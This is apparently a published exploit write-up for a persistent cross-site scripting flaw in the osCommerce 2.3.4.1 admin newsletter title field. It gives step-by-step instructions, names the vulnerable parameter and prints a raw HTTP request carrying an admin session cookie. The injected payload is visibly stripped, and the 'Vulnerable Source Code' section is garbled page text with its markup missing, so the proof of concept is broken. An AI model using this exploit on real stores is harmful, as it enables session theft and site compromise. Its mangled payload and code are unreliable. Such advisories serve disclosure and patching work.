# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting # Date: 2020-11-19 # Exploit Author: Emre Aslan # Vendor Homepage: https://www.oscommerce.com/ # Version: 2.3.4.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to admin panel. 2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new 3- Enter the XSS payload into the title section and save it. ==> Vulnerable Parameter <== title= (post parameter) ==> HTTP Request <== POST /catalog/admin/newsletters.php?action=insert HTTP/1.1 Host: (HOST) Connection: keep-alive Content-Length: 123 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://(HOST)/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://(HOST)/catalog/admin/newsletters.php?action=new Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: osCAdminID=s11ou44m0vrasducn78c6sg module=newsletter&title=">&content=xss ==> Vulnerable Source Code <==
Newsletter Manager
Newsletters Size Module Sent Status Action 
Preview "> 3 bytes newsletter False Unlocked  
Preview "> 7 bytes newsletter False Unlocked Info 
Displaying 1 to 2 (of 2 newsletters) Page 1 of 1
New Newsletter
">
PreviewLock

Date Added: 11/19/2020